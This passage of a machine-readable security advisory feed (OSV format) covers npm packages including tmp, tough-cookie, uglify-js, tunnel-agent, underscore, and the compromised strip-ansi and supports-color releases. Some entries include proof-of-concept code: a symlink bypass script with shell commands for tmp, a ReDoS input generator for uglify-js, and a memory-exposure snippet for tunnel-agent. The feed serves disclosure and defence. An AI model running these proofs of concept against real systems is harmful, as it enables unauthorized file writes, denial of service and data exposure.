"https://nvd.nist.gov/vuln/detail/CVE-2018-3737" }, { "type": "WEB", "url": "https://github.com/joyent/node-sshpk/commit/46065d38a5e6d1bccf86d3efb2fb83c14e3f9957" }, { "type": "WEB", "url": "https://hackerone.com/reports/319593" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2m39-62fm-q8r3" }, { "type": "WEB", "url": "https://github.com/joyent/node-sshpk/blob/v1.13.1/lib/formats/ssh.js#L17" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/606" } ], "database_specific": { "cwe_ids": [ "CWE-185", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:52:29Z", "nvd_published_at": "2018-06-07T02:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46980", "published": "2025-09-08T17:14:19Z", "modified": "2025-09-12T01:13:35Z", "aliases": [ "GHSA-vfjc-p7x3-q864" ], "summary": "Malicious code in strip-ansi (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (3736bb5cc515b07f47ad6b5bb06c367271994c4b6606f1ddeb91a056788c34c2)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "strip-ansi", "ecosystem": "npm", "purl": "pkg:npm/strip-ansi" }, "versions": [ "7.1.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strip-ansi/MAL-2025-46980.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vfjc-p7x3-q864" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-09T00:35:48.417988007Z", "modified_time": "2025-09-08T18:22:51Z", "sha256": "3736bb5cc515b07f47ad6b5bb06c367271994c4b6606f1ddeb91a056788c34c2", "source": "ghsa-malware", "versions": [ "7.1.1" ] }, { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-10T00:34:05.234284619Z", "modified_time": "2025-09-08T18:22:51Z", "sha256": "b9f36a9a8b8c75ed8926b3ceb034acefa7453d1217cef20a4f5d61388ab51f12", "source": "ghsa-malware", "versions": [ "7.1.1" ] }, { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-11T00:34:35.487371486Z", "modified_time": "2025-09-10T17:53:32Z", "sha256": "d1a76aaa14b97e80e6fda1c933066728d98ae6717da55eb385cb356dcad097be", "source": "ghsa-malware", "versions": [ "7.1.1" ] }, { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-12T00:33:58.10631928Z", "modified_time": "2025-09-10T17:53:32Z", "sha256": "e63c6c35fc417d7362b55829617faa7c8e8f920a33c2acda915ae3ab42337209", "source": "ghsa-malware", "versions": [ "7.1.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46981", "published": "2025-09-08T17:16:42Z", "modified": "2025-09-12T01:13:35Z", "aliases": [ "GHSA-pj3j-3w3f-j752" ], "summary": "Malicious code in supports-color (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (52d7b5f7535b1ec1964ec7f0a7019898a143639f62bf70f6a5e6b9e2ca580c12)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "supports-color", "ecosystem": "npm", "purl": "pkg:npm/supports-color" }, "versions": [ "10.2.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/supports-color/MAL-2025-46981.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-pj3j-3w3f-j752" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-09T00:35:48.417272496Z", "modified_time": "2025-09-08T18:22:23Z", "sha256": "52d7b5f7535b1ec1964ec7f0a7019898a143639f62bf70f6a5e6b9e2ca580c12", "source": "ghsa-malware", "versions": [ "10.2.1" ] }, { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-10T00:34:05.232662764Z", "modified_time": "2025-09-08T18:22:23Z", "sha256": "6edf0d38ed37ebe4b548be0aeea65438e663532c91f0e021f1981d03f254e638", "source": "ghsa-malware", "versions": [ "10.2.1" ] }, { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-11T00:34:35.482064314Z", "modified_time": "2025-09-10T17:54:37Z", "sha256": "c6c42dee5c9fab44968a5492f6069d39f9c0dd31e15ea9661b07c4b7a32a92d9", "source": "ghsa-malware", "versions": [ "10.2.1" ] }, { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-12T00:33:58.094285504Z", "modified_time": "2025-09-10T17:54:37Z", "sha256": "7915f9ca7a3b89c142b1610243be907ffe0c90ae4c03b664c003183d2a14cd36", "source": "ghsa-malware", "versions": [ "10.2.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4wf5-vphf-c2xc", "published": "2022-07-16T00:00:20Z", "modified": "2025-01-14T10:57:13.174999Z", "aliases": [ "CVE-2022-25858" ], "summary": "Terser insecure use of regular expressions leads to ReDoS", "details": "The package terser before 4.8.1, from 5.0.0 and before 5.14.2 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure usage of regular expressions.", "affected": [ { "package": { "name": "terser", "ecosystem": "npm", "purl": "pkg:npm/terser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.8.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-4wf5-vphf-c2xc/GHSA-4wf5-vphf-c2xc.json" } }, { "package": { "name": "terser", "ecosystem": "npm", "purl": "pkg:npm/terser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.14.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-4wf5-vphf-c2xc/GHSA-4wf5-vphf-c2xc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25858" }, { "type": "WEB", "url": "https://github.com/terser/terser/commit/a4da7349fdc92c05094f41d33d06d8cd4e90e76b" }, { "type": "WEB", "url": "https://github.com/terser/terser/commit/d8cc5691be980d663c29cc4d5ce67e852d597012" }, { "type": "PACKAGE", "url": "https://github.com/terser/terser" }, { "type": "WEB", "url": "https://github.com/terser/terser/blob/master/lib/compress/evaluate.js%23L135" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949722" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-TERSER-2806366" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2022-07-20T01:21:59Z", "nvd_published_at": "2022-07-15T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-52f5-9888-hmc6", "published": "2025-08-06T17:06:04Z", "modified": "2025-11-03T21:34:20Z", "aliases": [ "CVE-2025-54798" ], "related": [ "CGA-24xq-h2j3-3x86", "CGA-6p3x-59vm-9fq8" ], "summary": "tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter", "details": "### Summary\n\n`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.\n\n\n### Details\n\nAccording to the documentation there are some conditions that must be held:\n\n```\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50\n\nOther breaking changes, i.e.\n\n- template must be relative to tmpdir\n- name must be relative to tmpdir\n- dir option must be relative to tmpdir //\u003c-- this assumption can be bypassed using symlinks\n\nare still in place.\n\nIn order to override the system's tmpdir, you will have to use the newly\nintroduced tmpdir option.\n\n\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375\n* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.\n absolute paths are fine as long as they point to a location under the system's default temporary directory.\n Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, \n as tmp will not check the availability of the path, nor will it establish the requested path for you.\n```\n\nRelated issue: https://github.com/raszi/node-tmp/issues/207.\n\n\nThe issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579\nfunction _resolvePath(name, tmpDir) {\n if (name.startsWith(tmpDir)) {\n return path.resolve(name);\n } else {\n return path.resolve(path.join(tmpDir, name));\n }\n}\n```\n\nIf the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609\nfunction _assertIsRelative(name, option, tmpDir) {\n if (option === 'name') {\n // assert that name is not absolute and does not contain a path\n if (path.isAbsolute(name))\n throw new Error(`${option} option must not contain an absolute path, found \"${name}\".`);\n // must not fail on valid .\u003cname\u003e or ..\u003cname\u003e or similar such constructs\n let basename = path.basename(name);\n if (basename === '..' || basename === '.' || basename !== name)\n throw new Error(`${option} option must not contain a path, found \"${name}\".`);\n }\n else { // if (option === 'dir' || option === 'template') {\n // assert that dir or template are relative to tmpDir\n if (path.isAbsolute(name) \u0026\u0026 !name.startsWith(tmpDir)) {\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${name}\".`);\n }\n let resolvedPath = _resolvePath(name, tmpDir); //\u003c--- \n if (!resolvedPath.startsWith(tmpDir))\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${resolvedPath}\".`);\n }\n}\n```\n\n\n### PoC\n\nThe following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.\nTested on a Linux machine.\n\n- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it\n```bash\nmkdir $HOME/mydir1\n\nln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir\n```\n\n- check the folder is empty:\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n```\n\n- run the poc\n```bash\nnode main.js\nFile: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf\ntest 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'\ntest 2: dir option must be relative to \"/tmp\", found \"/foo\".\ntest 3: dir option must be relative to \"/tmp\", found \"/home/user/mydir1\".\n```\n\n- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]\n```\n\n\n- `main.js`\n```js\n// npm i tmp@0.2.3\n\nconst tmp = require('tmp');\n\nconst tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});\nconsole.log('File: ', tmpobj.name);\n\ntry {\n tmp.fileSync({ 'dir': 'mydir1'});\n} catch (err) {\n console.log('test 1:', err.message)\n}\n\ntry {\n tmp.fileSync({ 'dir': '/foo'});\n} catch (err) {\n console.log('test 2:', err.message)\n}\n\ntry {\n const fs = require('node:fs');\n const resolved = fs.realpathSync('/tmp/evil-dir');\n tmp.fileSync({ 'dir': resolved});\n} catch (err) {\n console.log('test 3:', err.message)\n}\n```\n\n\nA Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.\n```js\nfunction _resolvePath(name, tmpDir) {\n let resolvedPath;\n if (name.startsWith(tmpDir)) {\n resolvedPath = path.resolve(name);\n } else {\n resolvedPath = path.resolve(path.join(tmpDir, name));\n }\n return fs.realpathSync(resolvedPath);\n}\n```\n\n\n### Impact\n\nArbitrary temporary file / directory write via symlink", "affected": [ { "package": { "name": "tmp", "ecosystem": "npm", "purl": "pkg:npm/tmp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.2.4" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.2.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-52f5-9888-hmc6/GHSA-52f5-9888-hmc6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54798" }, { "type": "WEB", "url": "https://github.com/raszi/node-tmp/issues/207" }, { "type": "WEB", "url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b" }, { "type": "PACKAGE", "url": "https://github.com/raszi/node-tmp" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html" } ], "database_specific": { "cwe_ids": [ "CWE-59" ], "github_reviewed": true, "github_reviewed_at": "2025-08-06T17:06:04Z", "nvd_published_at": "2025-08-07T01:15:26Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-72xf-g2v4-qvf3", "published": "2023-07-01T06:30:16Z", "modified": "2024-06-21T21:33:53Z", "aliases": [ "CVE-2023-26136" ], "related": [ "CGA-hf6q-478m-mm8p" ], "summary": "tough-cookie Prototype Pollution vulnerability", "details": "Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in `rejectPublicSuffixes=false` mode. This issue arises from the manner in which the objects are initialized.", "affected": [ { "package": { "name": "tough-cookie", "ecosystem": "npm", "purl": "pkg:npm/tough-cookie" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.1.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-72xf-g2v4-qvf3/GHSA-72xf-g2v4-qvf3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/issues/282" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e" }, { "type": "PACKAGE", "url": "https://github.com/salesforce/tough-cookie" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HUE6ZR5SL73KHL7XUPAOEL6SB7HUDT2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PVVPNSAGSDS63HQ74PJ7MZ3MU5IYNVZ" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2023-07-07T21:39:57Z", "nvd_published_at": "2023-07-01T05:15:16Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g7q5-pjjr-gqvp", "published": "2018-07-24T20:14:39Z", "modified": "2023-11-08T03:58:56.101045Z", "aliases": [ "CVE-2017-15010" ], "summary": "Regular Expression Denial of Service in tough-cookie", "details": "Affected versions of `tough-cookie` are susceptible to a regular expression denial of service.\n\nThe amplification on this vulnerability is relatively low - it takes around 2 seconds for the engine to execute on a malicious input which is 50,000 characters in length.\n\nIf node was compiled using the `-DHTTP_MAX_HEADER_SIZE` however, the impact of the vulnerability can be significant, as the primary limitation for the vulnerability is the default max HTTP header length in node.\n\n\n## Recommendation\n\nUpdate to version 2.3.3 or later.", "affected": [ { "package": { "name": "tough-cookie", "ecosystem": "npm", "purl": "pkg:npm/tough-cookie" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-g7q5-pjjr-gqvp/GHSA-g7q5-pjjr-gqvp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15010" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/issues/92" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/f1ed420a6a92ea7a5418df6e39e676556bc0c71d" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2912" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2913" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1263" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1264" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-g7q5-pjjr-gqvp" }, { "type": "PACKAGE", "url": "https://github.com/salesforce/tough-cookie" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6VEBDTGNHVM677SLZDEHMWOP3ISMZSFT" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:tough-cookie:20170905" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/525" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/101185" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:36:20Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qhv9-728r-6jqg", "published": "2018-10-10T18:57:02Z", "modified": "2023-11-08T03:58:07.908980Z", "aliases": [ "CVE-2016-1000232" ], "summary": "ReDoS via long string of semicolons in tough-cookie", "details": "Affected versions of `tough-cookie` may be vulnerable to regular expression denial of service when long strings of semicolons exist in the `Set-Cookie` header.\n\n\n## Recommendation\n\nUpdate to version 2.3.0 or later.", "affected": [ { "package": { "name": "tough-cookie", "ecosystem": "npm", "purl": "pkg:npm/tough-cookie" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qhv9-728r-6jqg/GHSA-qhv9-728r-6jqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000232" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/615627206357d997d5e6ff9da158997de05235ae" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:2101" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2912" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/cve-2016-1000232" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qhv9-728r-6jqg" }, { "type": "PACKAGE", "url": "https://github.com/salesforce/tough-cookie" }, { "type": "WEB", "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-api-connect-is-affected-by-node-js-tough-cookie-module-vulnerability-to-a-denial-of-service-cve-2016-1000232" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/130" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:52:05Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xc7v-wxcw-j472", "published": "2019-06-03T17:08:26Z", "modified": "2020-08-31T18:29:19Z", "summary": "Memory Exposure in tunnel-agent", "details": "Versions of `tunnel-agent` before 0.6.0 are vulnerable to memory exposure.\n\nThis is exploitable if user supplied input is provided to the auth value and is a number.\n\nProof-of-concept:\n```js\nrequire('request')({\n method: 'GET',\n uri: 'http://www.example.com',\n tunnel: true,\n proxy:{\n protocol: 'http:',\n host:'127.0.0.1',\n port:8080,\n auth:USERSUPPLIEDINPUT // number\n }\n});\n```\n\n\n## Recommendation\n\nUpdate to version 0.6.0 or later.", "affected": [ { "package": { "name": "tunnel-agent", "ecosystem": "npm", "purl": "pkg:npm/tunnel-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.6.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-xc7v-wxcw-j472/GHSA-xc7v-wxcw-j472.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/request/tunnel-agent/commit/9ca95ec7219daface8a6fc2674000653de0922c0" }, { "type": "WEB", "url": "https://gist.github.com/ChALkeR/fd6b2c445834244e7d440a043f9d2ff4" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/598" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2019-06-03T17:08:06Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-34r7-q49f-h37c", "published": "2017-10-24T18:33:36Z", "modified": "2024-02-16T08:16:42.823655Z", "aliases": [ "CVE-2015-8857" ], "summary": "Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js", "details": "Versions of `uglify-js` prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.\n\n## Recommendation\n\nUpgrade UglifyJS to version \u003e= 2.4.24.", "affected": [ { "package": { "name": "uglify-js", "ecosystem": "npm", "purl": "pkg:npm/uglify-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.4.24" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-34r7-q49f-h37c/GHSA-34r7-q49f-h37c.json" } }, { "package": { "name": "uglifier", "ecosystem": "RubyGems", "purl": "pkg:gem/uglifier" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.2" } ] } ], "versions": [ "0.1.0", "0.1.1", "0.2.0", "0.3.0", "0.4.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "1.0.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.2.7", "1.3.0", "2.0.0", "2.0.1", "2.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.3.0", "2.3.1", "2.3.2", "2.3.3", "2.4.0", "2.5.0", "2.5.1", "2.5.3", "2.6.0", "2.6.1", "2.7.0", "2.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-34r7-q49f-h37c/GHSA-34r7-q49f-h37c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8857" }, { "type": "WEB", "url": "https://github.com/mishoo/UglifyJS2/issues/751" }, { "type": "WEB", "url": "https://github.com/lautis/uglifier/commit/4677bfe38142937ff952f95605bcec4618892c3e" }, { "type": "PACKAGE", "url": "https://github.com/mishoo/UglifyJS2" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uglifier/CVE-2015-8857.yml" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227190830/http://www.securityfocus.com/bid/96410" }, { "type": "WEB", "url": "https://zyan.scripts.mit.edu/blog/backdooring-js" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" } ], "database_specific": { "cwe_ids": [ "CWE-1254", "CWE-670" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:54:00Z", "nvd_published_at": "2017-01-23T21:59:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c9f4-xj24-8jqx", "published": "2017-10-24T18:33:36Z", "modified": "2023-11-08T03:58:03.623951Z", "aliases": [ "CVE-2015-8858" ], "summary": "Regular Expression Denial of Service in uglify-js", "details": "Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method.\n\n\n### Proof of Concept\n\n```\nvar u = require('uglify-js');\nvar genstr = function (len, chr) {\n var result = \"\";\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n\n return result;\n}\n\nu.parse(\"var a = \" + genstr(process.argv[2], \"1\") + \".1ee7;\");\n```\n\n### Results\n```\n$ time node test.js 10000\nreal\t0m1.091s\nuser\t0m1.047s\nsys\t0m0.039s\n\n$ time node test.js 80000\nreal\t0m6.486s\nuser\t0m6.229s\nsys\t0m0.094s\n```\n\n\n## Recommendation\n\nUpdate to version 2.6.0 or later.", "affected": [ { "package": { "name": "uglify-js", "ecosystem": "npm", "purl": "pkg:npm/uglify-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-c9f4-xj24-8jqx/GHSA-c9f4-xj24-8jqx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8858" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c9f4-xj24-8jqx" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/48" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96409" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:50Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cf4h-3jhx-xvhq", "published": "2021-05-06T16:09:43Z", "modified": "2025-11-04T16:33:59Z", "aliases": [ "CVE-2021-23358" ], "summary": "Arbitrary Code Execution in underscore", "details": "The package `underscore` from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument as it is not sanitized.", "affected": [ { "package": { "name": "underscore", "ecosystem": "npm", "purl": "pkg:npm/underscore" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.3.2" }, { "fixed": "1.12.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-cf4h-3jhx-xvhq/GHSA-cf4h-3jhx-xvhq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23358" }, { "type": "WEB", "url": "https://github.com/jashkenas/underscore/pull/2917" }, { "type": "WEB", "url": 